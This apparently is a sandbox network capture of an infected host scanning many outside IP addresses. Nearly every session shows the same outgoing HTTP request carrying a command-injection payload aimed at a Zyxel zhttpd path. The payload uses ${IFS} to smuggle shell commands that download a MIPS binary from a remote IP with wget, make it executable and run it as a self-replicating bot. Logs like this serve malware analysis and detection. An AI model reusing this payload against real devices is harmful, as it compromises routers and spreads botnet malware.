                                                  Jan 19, 2024 18:23:48.915685892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2788192.168.2.134504487.27.21.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915709019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2789192.168.2.135336683.64.101.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915735006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2790192.168.2.135472291.127.152.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915790081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2791192.168.2.1352890171.129.203.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915832996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2792192.168.2.134317078.210.234.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915848017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2793192.168.2.1343516156.73.195.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915900946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2794192.168.2.1335174166.39.116.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915932894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2795192.168.2.134358089.244.100.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915961981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2796192.168.2.133632641.20.181.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916022062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2797192.168.2.1352954118.164.80.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916049004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2798192.168.2.1336608175.116.235.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916095972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2799192.168.2.133986218.115.246.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916131973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2800192.168.2.1345346131.15.6.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916160107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2801192.168.2.134138477.245.241.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916201115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2802192.168.2.135793476.30.242.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916243076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2803192.168.2.1337930152.235.149.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916275024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2804192.168.2.1341208195.204.192.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916344881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2805192.168.2.1344268120.110.125.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916378975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2806192.168.2.135939820.148.34.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916410923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2807192.168.2.134251099.129.95.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916446924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2808192.168.2.1359446185.236.184.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916491985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2809192.168.2.1335710100.59.93.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916528940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2810192.168.2.135831467.171.181.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916584015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2811192.168.2.135179263.38.243.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916625977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2812192.168.2.135009097.20.78.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916666985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2813192.168.2.1347920144.205.142.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916692972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2814192.168.2.134349239.242.2.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916728973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2815192.168.2.134409092.32.127.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916786909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2816192.168.2.1354858209.187.219.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916814089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2817192.168.2.1348090203.96.146.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916841984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2818192.168.2.133977060.75.139.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916889906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2819192.168.2.133610063.71.116.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916924953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2820192.168.2.1348188212.203.249.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.916954041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2821192.168.2.134339079.175.202.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917001009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2822192.168.2.134315019.134.45.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917048931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2823192.168.2.133729257.100.78.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917093039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2824192.168.2.1335380164.233.104.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917145967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2825192.168.2.1339878173.9.111.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917179108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2826192.168.2.1356952170.2.25.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917205095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2827192.168.2.1333210103.100.152.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917241096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2828192.168.2.133540498.216.1.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917272091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2829192.168.2.133963483.62.2.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917316914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2830192.168.2.1354578152.11.237.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917355061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2831192.168.2.1335396119.229.69.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917413950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2832192.168.2.134680420.179.170.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917426109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2833192.168.2.1341174210.237.252.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917459011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2834192.168.2.135140080.131.38.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917519093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2835192.168.2.134836440.163.163.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917556047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2836192.168.2.133872449.240.105.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917598009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2837192.168.2.136077040.195.223.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917644978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2838192.168.2.1341836218.7.40.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917680979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2839192.168.2.135150073.232.96.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917742014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2840192.168.2.1345890218.107.63.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917778969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2841192.168.2.133727061.193.81.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917815924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2842192.168.2.135365299.1.61.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917836905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2843192.168.2.1357012193.10.244.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917876005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2844192.168.2.1343412120.243.222.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917917013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2845192.168.2.135906085.92.8.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917933941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2846192.168.2.1347672146.160.215.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.917994022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2847192.168.2.1332778221.160.125.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918029070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2848192.168.2.1340276140.16.14.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918062925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2849192.168.2.1349190142.236.239.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918098927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2850192.168.2.1342690199.188.242.187443
                                                  TimestampBytes transferredDirectionData
